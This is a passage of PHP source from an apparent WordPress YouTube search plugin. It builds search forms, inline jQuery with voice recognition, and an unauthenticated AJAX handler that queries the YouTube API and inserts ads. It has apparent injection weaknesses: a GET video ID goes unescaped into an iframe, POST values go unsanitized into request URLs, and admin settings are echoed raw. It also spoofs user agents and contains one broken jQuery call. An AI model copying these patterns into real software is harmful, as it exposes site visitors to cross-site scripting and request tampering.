<span class="pnplabel">' . esc_html($search_text) . '</span>
<form autocomplete="off" accept-charset="UTF-8" class="pnpsearchform crf_frm" action="' . esc_url_raw($redirect_page) . '" method="post" id="pnpsubmitredirform">
<div class="autocomplete crf_frk">';
if($search_prefill != '')
{
    $code .= '<input class="crf_xl pnpinput" type="text" name="pnpredirectwhat" placeholder="' . esc_attr($search_description) . '" id="pnpredirectwhat" value="' . esc_attr($search_prefill) . '" disabled>';
}
else
{
    $code .= '<input class="crf_xl pnpinput" type="text" name="pnpredirectwhat" placeholder="' . esc_attr($search_description) . '" id="pnpredirectwhat" value="">';
}
if (isset($vidopticon_Main_Settings['voice_recog']) && $vidopticon_Main_Settings['voice_recog'] === 'on') {$code .= '<span class="fa vidopticon_xo" id="vidopticon_voice_button_r">&#xf130;</span> ';}$code .= '<input id="pnpsearchtypevar" type="hidden" value="' . esc_attr($search_type) . '">';
$code .= '<input id="pnpsearchtypevarredirect" name="pnpsearchtypevarredirect" type="hidden" value="' . esc_attr($search_type) . '">';
$code .= '</div><div class="crf_plo" id="search_box_tools"><div><span class="button"><input type="button" name="vidopticon-submit-redirect-form" id="vidopticon-submit-redirect-form" value="' . esc_attr($find_text) . '" onclick="';
$code .= 'var myval = document.getElementById(\'pnpsearchtypevarredirect\').value;if(!myval) {myval = \'' . esc_html($search_type) . '\';}jQuery(this).closest(\'form\').submit();';
$code .= '"></span></div></div></form>';
if (isset($vidopticon_Main_Settings['voice_recog']) && $vidopticon_Main_Settings['voice_recog'] === 'on') {
    $code .= '<center><div id="voice_box_tools"><span class="fa crf_bl" id="vidopticon_voice_status_r">';
      if (isset($vidopticon_Main_Settings['voice_click']) && $vidopticon_Main_Settings['voice_click'] != '') {
          $code .= $vidopticon_Main_Settings['voice_click'];
      }
      else
      {
          $code .= sprintf( wp_kses( __( 'Click the %s icon to start voice recognition.', 'vidopticon-video-search-engine'), array() ), '&#xf130;' );
      }
      $code .= '</span></div></center>';
}
if (isset($vidopticon_Main_Settings['powered_by']) && $vidopticon_Main_Settings['powered_by'] != '') {
    $code .= '<div id="poweredby"><center>' . $vidopticon_Main_Settings['powered_by'] . '</center></div>';
}
$code .= '</div>';
    }
    else
    {
        $code = '';
    }
    $css_code = wp_strip_all_tags($css_code);
    wp_register_style( 'vidopticon-redirect-style', false );
    wp_enqueue_style( 'vidopticon-redirect-style' );
    wp_add_inline_style( 'vidopticon-redirect-style', $css_code );
    return $code;
}

add_shortcode( 'vidopticon-search-engine', 'vidopticon_display_custom_search_form' );
function vidopticon_display_custom_search_form( $atts ) {
    if ( is_admin() ) 
    {
        return;
    }
    $timeout = 3600;
    ini_set('memory_limit', '-1');
    ini_set('default_socket_timeout', $timeout);
    ini_set('safe_mode', 'Off');
    ini_set('max_execution_time', $timeout);
    ini_set('ignore_user_abort', 1);
    ini_set('user_agent', vidopticon_get_random_user_agent());
    if(function_exists('ignore_user_abort'))
{
    ignore_user_abort(true);
}
    if(function_exists('set_time_limit'))
{
    set_time_limit($timeout);
}
    $css_code = '';
    extract(shortcode_atts(array(
        'search_text' => 'Search now:',
        'search_description' => '&nbsp;Search...',
        'search_prefill' => '',
        'find_text' => 'find',
        'width' => 'auto',
        'backgound_color' => '#FFFFFF',
        'border_color' => '#919294',
        'border_width' => '1px',
        'font_type' => 'Arial, sans-serif',
        'font_size' => '13px',
        'navigation_font_size' => '20px',
        'text_color' => '#000000',
        'link_color' => '#198ADC',
        'ad_density' => '3',
        'max' => '10',
        'result_div_id' => 'pnpSearchResult',
        'searching' => 'Searching...',
        'google_ads' => 'off',
        'search_type' => 'youtube',
        'height_px' => '',
        'enable_iframe' => ''
    ), $atts));
    $actual_url = '';
    if (isset($enable_iframe) && (trim($enable_iframe) == '1' || trim($enable_iframe) == 'on'))
    {
        $actual_url = (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on' ? "https" : "http") . "://$_SERVER[HTTP_HOST]$_SERVER[REQUEST_URI]";
        if (isset($_GET['vidid']) && trim($_GET['vidid']) != '') 
        {
            if (isset($_GET['nonce']) && trim($_GET['nonce']) != '') 
            {
                if(wp_verify_nonce( trim($_GET['nonce']), 'vidopticon_search_iframe' ))
                {
                    if($height_px == '')
                    {
                        $height_px = '800px';
                    }
                    $vidid = trim($_GET['vidid']);
                    $vidid = urldecode($vidid);
                    if (!empty($vidid)) 
                    {
                        return '<div class="aiex-container">
                            <iframe class="aiex-iframe"
                            width="100%" height="' . $height_px . '"
                            src="https://www.youtube.com/embed/' . $vidid . '"
                            frameborder="0" allowfullscreen=""></iframe>
                        </div>';
                    }
                }
            }
        }
    }
    $search_type = trim($search_type);
    if($search_type != 'youtube')
    {
        $search_type = 'youtube';
    }
    if(!is_numeric($max))
    {
        $max = '10';
    }
    elseif($max > 50)
    {
        $max = '50';
    }
    $vidopticon_Main_Settings = get_option('vidopticon_Main_Settings', false);
    if (!isset($vidopticon_Main_Settings['app_id']) || trim($vidopticon_Main_Settings['app_id']) == '') {
        return esc_html__('You need to enter a YouTube API key for this to function!', 'vidopticon-video-search-engine');
    }
    if (isset($vidopticon_Main_Settings['vidopticon_enabled']) && $vidopticon_Main_Settings['vidopticon_enabled'] === 'on') 
    {
        if(isset($_POST['pnpsearchtypevarredirect']) && isset($_POST['pnpredirectwhat']) && $_POST['pnpsearchtypevarredirect'] != '' && $_POST['pnpredirectwhat'] != '')
        {
            $search_for_me = $_POST['pnpredirectwhat'];
            $search_type = $_POST['pnpsearchtypevarredirect'];
        }
        else
        {
            $search_for_me = '';
        }
        $scriptcode = 'if(typeof jQuery==\'undefined\') {
            var headTag = document.getElementsByTagName("head")[0];
            var jqTag = document.createElement(\'script\');
            jqTag.type = \'text/javascript\';
            jqTag.src = \'https://code.jquery.com/jquery-1.11.3.min.js\';
            jqTag.onload = vidopticonJQueryCode;
            headTag.appendChild(jqTag);
            }else{vidopticonJQueryCode();}
            function vidopticonJQueryCode()
            {';
            $scriptcode .= 'jQuery(document).ready(function(){
                jQuery(\'#pnpwhat\').keypress(function(e){
                  if(e.keyCode==13)
                  {
                      jQuery(\'#vidopticon-submit-form\').on(\'click\', );
                      e.preventDefault();
                  }
                });
        });
    }
}';
if (isset($vidopticon_Main_Settings['voice_recog']) && $vidopticon_Main_Settings['voice_recog'] === 'on') {
$scriptcode .= 'try {
    var SpeechRecognition = window.SpeechRecognition || window.webkitSpeechRecognition;
    var recognition = new SpeechRecognition();
    recognition.onstart = function() {
      jQuery(\'#vidopticon_voice_status\').text("';
      if (isset($vidopticon_Main_Settings['voice_started']) && $vidopticon_Main_Settings['voice_started'] != '') {
          $scriptcode .= $vidopticon_Main_Settings['voice_started'];
      }
      else
      {
          $scriptcode .= esc_html__('Voice recognition activated. Try speaking into the microphone.', 'vidopticon-video-search-engine');
      }
      $scriptcode .= '");
    }

    recognition.onspeechend = function() {
      jQuery(\'#vidopticon_voice_status\').text("';
      if (isset($vidopticon_Main_Settings['voice_paused']) && $vidopticon_Main_Settings['voice_paused'] != '') {
          $scriptcode .= $vidopticon_Main_Settings['voice_paused'];
      }
      else
      {
          $scriptcode .= esc_html__('You were quiet for a while so voice recognition turned itself off.', 'vidopticon-video-search-engine');
      }
      $scriptcode .= '");
        jQuery("#vidopticon_voice_button").html(\'\\uf130\');
        started = false;
    }

    recognition.onerror = function(event) {
      if(event.error == \'no-speech\') {
        jQuery(\'#vidopticon_voice_status\').text("';
      if (isset($vidopticon_Main_Settings['voice_failed']) && $vidopticon_Main_Settings['voice_failed'] != '') {
          $scriptcode .= $vidopticon_Main_Settings['voice_failed'];
      }
      else
      {
          $scriptcode .= esc_html__('No speech was detected. Try again.', 'vidopticon-video-search-engine');
      }
      $scriptcode .= '");
        jQuery("#vidopticon_voice_button").html(\'\\uf130\');
        started = false;
      };
    }
    recognition.onresult = function(event) {
      var current = event.resultIndex;
      var transcript = event.results[current][0].transcript;
      noteContent = jQuery(\'#pnpwhat\').val();
      var mobileRepeatBug = false;
      if(current == 1)
      {
          if(transcript == event.results[0][0].transcript)
          {
              mobileRepeatBug = true;
          }
      }
      if(!mobileRepeatBug) {
          noteContent += " " + transcript;
          jQuery(\'#pnpwhat\').val(noteContent);
      }
    }
    var started = false;
    jQuery( document ).ready(function() {
        jQuery(\'#vidopticon_voice_button\').on(\'click\', function(e) {
          if(started == false)
          {
              started = true;
              recognition.start();
              jQuery("#vidopticon_voice_button").html(\'\\uf131\');
          }
          else
          {
              started = false;
              recognition.stop();
              jQuery("#vidopticon_voice_button").html(\'\\uf130\');
          }
        });
    });
}
catch(e) {
  console.error(\'' . esc_html__('No browser support:', 'vidopticon-video-search-engine') . ' \' . e);
}';
}
if(!wp_script_is('vidopticon-dummy-handle'))
{
    wp_register_script( 'vidopticon-dummy-handle', '', [], '', true );
    wp_enqueue_script( 'vidopticon-dummy-handle'  );
}
wp_add_inline_script( 'vidopticon-dummy-handle', $scriptcode );
$css_code = '.autocomplete-items {
  border: 1px solid #d4d4d4;
  border-bottom: none;
  border-top: none;
  z-index: 99;
  top: 100%;
  left: 0;
  right: 0;
}
.autocomplete-items div {
  padding: 10px;
  cursor: pointer;
  background-color: #fff; 
  border-bottom: 1px solid #d4d4d4; 
}
.autocomplete-items div:hover {
  background-color: #e9e9e9; 
}
.autocomplete-active {
  background-color: DodgerBlue !important; 
  color: #ffffff; 
}
div.pnpsearchbox{
text-align: left ; 
border: ' . esc_html($border_width) . ' solid ' . esc_html($border_color) . '; 
background-color: ' . esc_html($backgound_color) . ';
padding: 8px ; 
font-family: ' . esc_html($font_type) . '; 
font-size: ' . esc_html($font_size) . '; 
color: ' . esc_html($text_color) . '; 
width: ' . esc_html($width) . ';
}
.pnpnavig { 
font-size: ' . esc_html($navigation_font_size) . '; 
}
div.pnpsearchbox a{ 
color: ' . esc_html($link_color) . '; 
}
div.pnpbotl a{
   color: ' . esc_html($link_color) . ';
}
div.pnpsearchbox form.pnpsearchform{ 
padding-top: 0px ; 
padding-bottom: 0px ; 
padding-left: 0px ; 
padding-right: 0px ;
}
div#pnpSearchResult{ 
}
div#pnpSearchResult p.topline{ 
font-size: 16px ; 
font-weight: bold ; 
margin-bottom: 8px ; 
margin-top: 5px ;
}
span.pnplabel{ 
word-wrap: break-word;
white-space:normal;
font-size: 13px ; 
font-weight: bold ; 
color: ' . esc_html($text_color) . '; 
}
span.pnplabelsmall{ 
word-wrap: break-word;
white-space:normal;
font-size: 11px ; 
color: ' . esc_html($text_color) . '; 
}
input.pnpinput{ 
width: 90%; 

border: 1px solid #AAA;
border-right: 1px solid #DDD;
border-bottom: 1px solid #DDD;
margin-top:2px;
margin-bottom:2px;
}
input.pnpinput{ 
    color: #642891;
}
input.pnpbutton{  
font-family:  ' . esc_html($font_type) . '; 
}
div.pnpsearch{ 
margin: 0px ; 
margin-bottom: 10px ; 
overflow: hidden ;
}
div.pnpsearch p { 
margin: 0px ; 
}
div.pnpsearch p.searchtitle{ 
font-size: 14 ; 
font-weight: bold ;
}
div.pnpsearch .company{ 
color: #666666; 
}
div.pnpsearch .locations{ 
color: #666666;
}
div.pnpsearch .site{ 
color: #099E2D ; 
}
#vidopticon_voice_button {
color:#000000;
font-size: 16px;
font-weight: bold;
cursor: pointer;
}
#search_box_tools span.button{
float:left;
color:#666;
text-align:center;
margin-left:5px;
margin-right:5px;
}
#search_box_tools span.button input{
float:left ;
color:#FFFFFF;
font-size: 16px;
font-weight: bold;
cursor: pointer;
border: 1px solid #d70;
-webkit-border-radius: 2px;
-moz-border-radius: 3px;
border-radius: 2px;
background: #e81;
background-image: linear-gradient(top, #F19F40 0%, #EE8711 100%);
background-image: -o-linear-gradient(top, #F19F40 0%, #EE8711 100%);
background-image: -moz-linear-gradient(top, #F19F40 0%, #EE8711 100%);
background-image: -webkit-linear-gradient(top, #F19F40 0%, #EE8711 100%);
background-image: -ms-linear-gradient(top, #F19F40 0%, #EE8711 100%);
background-image: -webkit-gradient(linear,left top,left bottom,color-stop(0, #F19F40),color-stop(1, #EE8711));
}
.bloggerDiv{display:none;}td {border: 0px solid transparent !important;}';
if (isset($vidopticon_Main_Settings['img_x']) && $vidopticon_Main_Settings['img_x'] != '') {$img_x = $vidopticon_Main_Settings['img_x'];}else{$img_x = '8';}if (isset($vidopticon_Main_Settings['img_y']) && $vidopticon_Main_Settings['img_y'] != '') {$img_y = $vidopticon_Main_Settings['img_y'];}else{$img_y = '-30';}
$css_code .= '.vidopticon_xo
{
position: relative;z-index: 666;top: ' . esc_html($img_y) . 'px;left: ' . esc_html($img_x) . 'px;
}';

$myscriptcode = 'function displayGoogleAds(){
    jQuery(\'ins\').each(function(){
        (adsbygoogle = window.adsbygoogle || []).push({});
    });
}
function vidopticon_call_ajax(page_num, max, ad_density, result_div_id, searching, pnp_type, nextpagetoken, enable_iframe, actual_url){if(pnp_type == "youtube_add"){document.getElementById("pnpsearchtypevar").value = "images";document.getElementById("pnploadmore").innerHTML = "<center><br/><br/>';
if (isset($vidopticon_Main_Settings['loading']) && $vidopticon_Main_Settings['loading'] != '')
{
    $myscriptcode .= $vidopticon_Main_Settings['loading'];
}
$myscriptcode .= '</center><br/>";}else{document.getElementById("pnpsearchtypevar").value = pnp_type;}var what = document.getElementById("pnpwhat").value;var data = {action: "vidopticon_ui_my_action", what: what, page_num: page_num, max: max, ad_density: ad_density, result_div_id: result_div_id, searching: searching, pnp_type: pnp_type, nextpagetoken: nextpagetoken, enable_iframe: enable_iframe, actual_url: actual_url};var ajaxurl = "' . admin_url('admin-ajax.php') . '";jQuery.post(ajaxurl, data, function(response) {
if(pnp_type == "youtube_add"){document.getElementById("pnploadmore").outerHTML = "";document.getElementById("' . esc_html($result_div_id) . '").innerHTML = document.getElementById("' . esc_html($result_div_id) . '").innerHTML + response;} else {document.getElementById("' . esc_html($result_div_id) . '").innerHTML = response;} '; 
if($google_ads == 'on')
{
    $myscriptcode .= 'displayGoogleAds();';
}
$myscriptcode .= '});}';
if(!wp_script_is('vidopticon-dummy-handle'))
{
    wp_register_script( 'vidopticon-dummy-handle', '', [], '', true );
    wp_enqueue_script( 'vidopticon-dummy-handle'  );
}
wp_add_inline_script( 'vidopticon-dummy-handle', $myscriptcode );
$code = '<a name="pnpsearchboxanchor"></a>
<div class="pnpsearchbox">
<span class="pnplabel">' . esc_html($search_text) . '</span>
<form autocomplete="off" accept-charset="UTF-8" class="pnpsearchform crf_frm">
<div class="autocomplete crf_frk">';
if($search_prefill != '')
{
    $code .= '<input class="crf_xl pnpinput" type="text" name="pnpwhat" placeholder="' . esc_attr($search_description) . '" id="pnpwhat" value="' . esc_attr($search_prefill) . '" disabled>';
}
else
{
    $code .= '<input class="crf_xl pnpinput" type="text" name="pnpwhat" placeholder="' . esc_attr($search_description) . '" id="pnpwhat" value="' . esc_attr($search_for_me) . '">';
}
if (isset($vidopticon_Main_Settings['voice_recog']) && $vidopticon_Main_Settings['voice_recog'] === 'on') {$code .= '<span class="fa vidopticon_xo" id="vidopticon_voice_button">&#xf130;</span> ';}$code .= '<input id="pnpsearchtypevar" type="hidden" value="' . esc_attr($search_type) . '">';
$code .= '</div><div class="crf_plo" id="search_box_tools"><div><span class="button"><input type="button" name="vidopticon-submit-form" id="vidopticon-submit-form" value="' . esc_attr($find_text) . '" onclick="';
$code .= 'document.getElementById(\'' . esc_html($result_div_id) . '\').innerHTML = \'' . esc_html($searching) . '\';var myval = document.getElementById(\'pnpsearchtypevar\').value;if(!myval) {myval = \'' . esc_html($search_type) . '\';}vidopticon_call_ajax(1, ' . esc_html($max) . ', ' . esc_html($ad_density) . ', \'' . esc_html($result_div_id) . '\', \'' . esc_html($searching) . '\', myval, \'\', \'' . esc_html($enable_iframe) .'\', \'' . esc_html($actual_url) .'\');';
$code .= '"></span></div></div></form>
<div id="' . esc_html($result_div_id) . '">&nbsp;</div>';
if (isset($vidopticon_Main_Settings['voice_recog']) && $vidopticon_Main_Settings['voice_recog'] === 'on') {
    $code .= '<center><div id="voice_box_tools"><span class="fa crf_bl" id="vidopticon_voice_status">';
      if (isset($vidopticon_Main_Settings['voice_click']) && $vidopticon_Main_Settings['voice_click'] != '') {
          $code .= $vidopticon_Main_Settings['voice_click'];
      }
      else
      {
          $code .= sprintf( wp_kses( __( 'Click the %s icon to start voice recognition.', 'vidopticon-video-search-engine'), array() ), '&#xf130;' );
      }
      $code .= '</span></div></center>';
}
if (isset($vidopticon_Main_Settings['powered_by']) && $vidopticon_Main_Settings['powered_by'] != '') {
    $code .= '<div id="poweredby"><center>' . $vidopticon_Main_Settings['powered_by'] . '</center></div>';
}
$code .= '</div>';
        if($search_for_me != '')
        {
            $scode = 'document.getElementById(\'' . esc_html($result_div_id) . '\').innerHTML = \'' . esc_html($searching) . '\';vidopticon_call_ajax(1, ' . esc_html($max) . ', ' . esc_html($ad_density) . ', \'' . esc_html($result_div_id) . '\', \'' . esc_html($searching) . '\', \'' . esc_html($search_type) . '\', \'\', \'' . esc_html($enable_iframe) .'\', \'' . esc_html($actual_url) .'\');';
            if(!wp_script_is('vidopticon-dummy-handle'))
            {
                wp_register_script( 'vidopticon-dummy-handle', '', [], '', true );
                wp_enqueue_script( 'vidopticon-dummy-handle'  );
            }
            wp_add_inline_script( 'vidopticon-dummy-handle', $scode );
        }
    }
    else
    {
        $code = '';
    }
    $css_code = wp_strip_all_tags($css_code);
    wp_register_style( 'vidopticon-main-style', false );
    wp_enqueue_style( 'vidopticon-main-style' );
    wp_add_inline_style( 'vidopticon-main-style', $css_code );
    return $code;
}
add_action('wp_ajax_nopriv_vidopticon_ui_my_action', 'vidopticon_ui_my_action_callback');
add_action('wp_ajax_vidopticon_ui_my_action', 'vidopticon_ui_my_action_callback');
function vidopticon_ui_my_action_callback()
{
    $timeout = 3600;
    ini_set('memory_limit', '-1');
    ini_set('default_socket_timeout', $timeout);
    ini_set('safe_mode', 'Off');
    ini_set('max_execution_time', $timeout);
    ini_set('ignore_user_abort', 1);
    ini_set('user_agent', vidopticon_get_random_user_agent());
    if(function_exists('ignore_user_abort'))
{
    ignore_user_abort(true);
}
    if(function_exists('set_time_limit'))
{
    set_time_limit($timeout);
}
    
    $vidopticon_Main_Settings = get_option('vidopticon_Main_Settings', false);
    $what = $_POST['what'];
    $max = $_POST['max'];
    $result_div_id = $_POST['result_div_id'];
    $searching = $_POST['searching'];
    $pnp_type = $_POST['pnp_type'];
    $nextpagetoken = $_POST['nextpagetoken'];
    $enable_iframe = $_POST['enable_iframe'];
    $actual_url = $_POST['actual_url'];
    if($max == '0' || empty($max))
    {
        $max = 10;
    }
    $ad_density = $_POST['ad_density'];
    if (isset($vidopticon_Main_Settings['channel_id'])) {
        $channel_id = $vidopticon_Main_Settings['channel_id'];
    } else {
        $channel_id = '';
    }
    if (isset($vidopticon_Main_Settings['event_type'])) {
        $event_type = $vidopticon_Main_Settings['event_type'];
    } else {
        $event_type = '';
    }
    if (isset($vidopticon_Main_Settings['video_language'])) {
        $video_language = $vidopticon_Main_Settings['video_language'];
    } else {
        $video_language = '';
    }
    if (isset($vidopticon_Main_Settings['coord'])) {
        $coord = $vidopticon_Main_Settings['coord'];
    } else {
        $coord = '';
    }
    if (isset($vidopticon_Main_Settings['radius'])) {
        $radius = $vidopticon_Main_Settings['radius'];
    } else {
        $radius = '';
    }
    if (isset($vidopticon_Main_Settings['result_type'])) {
        $result_type = $vidopticon_Main_Settings['result_type'];
    } else {
        $result_type = '';
    }
    if (isset($vidopticon_Main_Settings['video_category'])) {
        $video_category = $vidopticon_Main_Settings['video_category'];
    } else {
        $video_category = '';
    }
    if (isset($vidopticon_Main_Settings['video_embeddable'])) {
        $video_embeddable = $vidopticon_Main_Settings['video_embeddable'];
    } else {
        $video_embeddable = '';
    }
    if (isset($vidopticon_Main_Settings['search_order'])) {
        $search_order = $vidopticon_Main_Settings['search_order'];
    } else {
        $search_order = '';
    }
    if (isset($vidopticon_Main_Settings['video_syndication'])) {
        $video_syndication = $vidopticon_Main_Settings['video_syndication'];
    } else {
        $video_syndication = '';
    }
    if (isset($vidopticon_Main_Settings['video_type'])) {
        $video_type = $vidopticon_Main_Settings['video_type'];
    } else {
        $video_type = '';
    }
    if (isset($vidopticon_Main_Settings['video_license'])) {
        $video_license = $vidopticon_Main_Settings['video_license'];
    } else {
        $video_license = '';
    }
    if (isset($vidopticon_Main_Settings['video_duration'])) {
        $video_duration = $vidopticon_Main_Settings['video_duration'];
    } else {
        $video_duration = '';
    }
    if (isset($vidopticon_Main_Settings['video_dimension'])) {
        $video_dimension = $vidopticon_Main_Settings['video_dimension'];
    } else {
        $video_dimension = '';
    }
    if (isset($vidopticon_Main_Settings['video_definition'])) {
        $video_definition = $vidopticon_Main_Settings['video_definition'];
    } else {
        $video_definition = '';
    }
    if (isset($vidopticon_Main_Settings['video_caption'])) {
        $video_caption = $vidopticon_Main_Settings['video_caption'];
    } else {
        $video_caption = '';
    }
    if (isset($vidopticon_Main_Settings['region_code'])) {
        $region_code = $vidopticon_Main_Settings['region_code'];
    } else {
        $region_code = '';
    }
    if (isset($vidopticon_Main_Settings['safe_search'])) {
        $safe_search = $vidopticon_Main_Settings['safe_search'];
    } else {
        $safe_search = '';
    }
    $parameters = '';
    if($coord != '' && $radius != '')
    {
        $geocode = vidopticon_get_web_page("http://maps.google.com/maps/api/geocode/json?address=" . urlencode(trim($coord)) . "&sensor=false");
        if($geocode === false)
        {
            global $wp_filesystem;
            if ( ! is_a( $wp_filesystem, 'WP_Filesystem_Base') ){
                include_once(ABSPATH . 'wp-admin/includes/file.php');$creds = request_filesystem_credentials( site_url() );
                wp_filesystem($creds);
            }
            $geocode = $wp_filesystem->get_contents("http://maps.google.com/maps/api/geocode/json?address=" . urlencode(trim($coord)) . "&sensor=false");
        }
        if($geocode !== FALSE)
        {
            $output = json_decode($geocode);
            if(isset($output->results[0]->geometry->location->lat) && isset($output->results[0]->geometry->location->lng))
            {
                $lat = $output->results[0]->geometry->location->lat;
                $lng = $output->results[0]->geometry->location->lng;
                $parameters .= '&location=' . $lat . ',' . $lng;
                $parameters .= '&locationRadius=' . urlencode(trim($radius));
            }
        }
    }     
    if($pnp_type == 'youtube' || $pnp_type == 'youtube_add')
    {
        $feed_uri = 'https://www.googleapis.com/youtube/v3/search?part=snippet&type=video&key='.trim($vidopticon_Main_Settings['app_id']);
    }
    else
    {
        $feed_uri = 'https://www.googleapis.com/youtube/v3/search?part=snippet&type=video&key='.trim($vidopticon_Main_Settings['app_id']);
    }
    if($nextpagetoken !== '')
    {
        $feed_uri .= '&pageToken=' . $nextpagetoken;
    }
    $feed_uri .= '&maxResults=' . $max;
    if($region_code != 'any' && $region_code != '')
    {
        $feed_uri .= '&regionCode=' . $region_code;
    }
    if($safe_search != 'moderate' && $safe_search != '')
    {
        $feed_uri .= '&safeSearch=' . $safe_search;
    }
    if($video_language != 'any' && $video_language != '')
    {
        $feed_uri.='&relevanceLanguage='.$video_language;
    }
    if($what != '*')
    {
        $feed_uri .= '&q=' . urlencode(trim(stripslashes(str_replace('&quot;', '"', $what))));
    }
    if($channel_id != '')
    {
        $feed_uri .= '&channelId=' . $channel_id;
    }
    if($event_type != '' && $event_type != 'uploaded')
    {
        $feed_uri .= '&eventType=' . $event_type;
    }
    if($result_type != 'any' && $result_type != '')
    {
        $feed_uri .= '&channelType=' . $result_type;
    }
    if($video_category != '0' && $video_category != '')
    {
        $feed_uri .= '&videoCategoryId=' . $video_category;
    }
    if($video_embeddable != 'any' && $video_embeddable != '')
    {
        $feed_uri .= '&videoEmbeddable=' . $video_embeddable;
    }
    if($search_order != 'relevance' && $search_order != '')
    {
        $feed_uri .= '&order=' . $search_order;
    }
    if($video_syndication != 'any' && $video_syndication != '')
    {
        $feed_uri .= '&videoSyndicated=' . $video_syndication;
    }
    if($video_duration != 'any' && $video_duration != '')
    {
        $feed_uri .= '&videoDuration=' . $video_duration;
    }
    if($video_caption != 'any' && $video_caption != '')
    {
        $feed_uri .= '&videoCaption=' . $video_caption;
    }
    if($video_type != 'any' && $video_type != '')
    {
        $feed_uri .= '&videoType=' . $video_type;
    }
    if($video_definition != 'any' && $video_definition != '')
    {
        $feed_uri .= '&videoDefinition=' . $video_definition;
    }
    if($video_dimension != 'any' && $video_dimension != '')
    {
        $feed_uri .= '&videoDimension=' . $video_dimension;
    }
    if($video_license != 'any' && $video_license != '')
    {
        $feed_uri .= '&videoLicense=' . $video_license;
    }
    if($parameters != '')
    {
        $feed_uri .= $parameters;
    }
    $exec = vidopticon_get_web_page($feed_uri);
    if ($exec === FALSE) {
        echo '';
        vidopticon_log_to_file('Failed to exec curl in feed_uri! ' . $feed_uri);
        wp_die();
    }
    $json  = json_decode($exec);
    if(!isset($json->items))
    {
        echo '';
        vidopticon_log_to_file('Failed to fetch items: feed_uri: ' . $feed_uri . ' , response: ' . print_r($json, true));
        wp_die();
    }
    if(isset($json->nextPageToken))
    {
        $next_next = $json->nextPageToken;
    }
    else
    {
        $next_next = '';
    }
    $results_count = $json->pageInfo->totalResults;
    $items = $json->items;
    if (isset($vidopticon_Main_Settings['enable_tracking']) && $vidopticon_Main_Settings['enable_tracking'] == 'on')
    {
        vidopticon_track_to_file('[' . $pnp_type . ']:' . $what);
    }
    $output = '';
    if($pnp_type == 'youtube')
    {
        if(count($items) > 0)
        {
            if (isset($vidopticon_Main_Settings['matching_str']) && $vidopticon_Main_Settings['matching_str'] != '')
            {
                $output .= $vidopticon_Main_Settings['matching_str'] . ' ';
                if($results_count == 1000000)
                {
                    $output .= '> ';
                }
                $output .= $results_count . '<br/><br/>';
            }
        }
        else
        {
            if (isset($vidopticon_Main_Settings['no_matching_str']) && $vidopticon_Main_Settings['no_matching_str'] != '')
            {
                $output .= $vidopticon_Main_Settings['no_matching_str'] . '<br/><br/>';
            }
            $total_pages = '1';
            echo $output;
            wp_die();
        }
    }
    {
        if (!get_option('vidopticon_ad_list')) {
            $add_arr = array();
        } else {
            $add_arr = get_option('vidopticon_ad_list');
        }
        $ii = 0;
        $shown = 0;
        if (isset($vidopticon_Main_Settings['randomize_ads']) && $vidopticon_Main_Settings['randomize_ads'] === 'on') {
            $rnd_ad = true;
        }
        else
        {
            $rnd_ad = false;
        }
        $process_add_arr = array();
        if(!empty($add_arr))
        {
            $bundle_values   = array_values($add_arr);
            foreach($bundle_values as $myValues)
            {
                $array_my_values = array_values($myValues);
                for($iji=0;$iji<count($array_my_values);++$iji)
                {
                    if(is_string($array_my_values[$iji]))
                    {
                        $array_my_values[$iji]=stripslashes($array_my_values[$iji]);
                    }
                }
                $ad_type                = $array_my_values[0];
                $ad_html                = $array_my_values[1];
                $active                 = $array_my_values[2];
                $vidopticon_start       = $array_my_values[3];
                $vidopticon_end         = $array_my_values[4];
                $vidopticon_keywords    = $array_my_values[5];
                if($active == '1')
                {
                    $no_go = false;
                    $add_first = false;
                    if($vidopticon_start != '')
                    {
                        $my_time = strtotime($vidopticon_start);
                        if($my_time !== false)
                        {
                            if($my_time < time())
                            {
                                $no_go = true;
                            }
                        }
                    }
                    if($no_go == false && $vidopticon_end != '')
                    {
                        $my_time = strtotime($vidopticon_end);
                        if($my_time !== false)
                        {
                            if($my_time > time())
                            {
                                $no_go = true;
                            }
                        }
                    }
                    if (isset($vidopticon_Main_Settings['only_match']) && $vidopticon_Main_Settings['only_match'] === 'on') {
                        $search_words = explode(' ', $what);
                        $matched = false;
                        foreach($search_words as $sw)
                        {
                            if($vidopticon_keywords != '')
                            {
                                if(stristr($vidopticon_keywords, $sw) !== false)
                                {
                                    $matched = true;
                                    break;
                                }
                                if(stristr($ad_html, $sw) !== false)
                                {
                                    $matched = true;
                                    break;
                                }
                            }
                            else
                            {
                                if(stristr($ad_html, $sw) !== false)
                                {
                                    $matched = true;
                                    break;
                                }
                            }
                        }
                        if($matched == false)
                        {
                            $no_go = true;
                        }
                    }
                    else
                    {
                        if($rnd_ad == false)
                        {
                            $search_words = explode(' ', $what);
                            $matched = false;
                            foreach($search_words as $sw)
                            {
                                if($vidopticon_keywords != '')
                                {
                                    if(stristr($vidopticon_keywords, $sw) !== false)
                                    {
                                        $matched = true;
                                        break;
                                    }
                                    if(stristr($ad_html, $sw) !== false)
                                    {
                                        $matched = true;
                                        break;
                                    }
                                }
                                else
                                {
                                    if(stristr($ad_html, $sw) !== false)
                                    {
                                        $matched = true;
                                        break;
                                    }
                                }
                            }
                            if($matched == true)
                            {
                                $add_first = true;
                            }
                        }
                    }
                    if($no_go == false)
                    {
                        if($pnp_type == 'youtube' || $pnp_type == 'youtube_add')
                        {
                            if($ad_type == 'youtube')
                            {
                                if($add_first == true)
                                {
                                    array_unshift($process_add_arr, $array_my_values);
                                }
                                else
                                {
                                    $process_add_arr[] = $array_my_values;
                                }
                            }
                        }
                    }
                }
            }
        }
        $show_ad = true;
        if(isset($vidopticon_Main_Settings['max_monetize']) && $vidopticon_Main_Settings['max_monetize'] != '')
        {
            $max_monetize = $vidopticon_Main_Settings['max_monetize'];
        }
        else
        {
            $max_monetize = 9999999;
        }
        $shorted_nr = 0;
        foreach($items as $av)
        {
            $my_url = 'https://www.youtube.com/watch?v=' . $av->id->videoId;
            $my_desc = $av->snippet->description;
            $my_title = $av->snippet->title;
            if(isset($vidopticon_Main_Settings['shortest_api']) && $vidopticon_Main_Settings['shortest_api'] != '')
            {
                if($shorted_nr < $max_monetize)
                {
                    $my_url = vidopticon_url_handle($my_url, $vidopticon_Main_Settings['shortest_api']);
                    $shorted_nr++;
                }
            }
            if($show_ad == true && !empty($process_add_arr))
            {
                if($ii % $ad_density == 0)
                {
                    if($rnd_ad == true)
                    {
                        $my_random_elem = array_rand($process_add_arr);
                        $myValues = $process_add_arr[$my_random_elem];
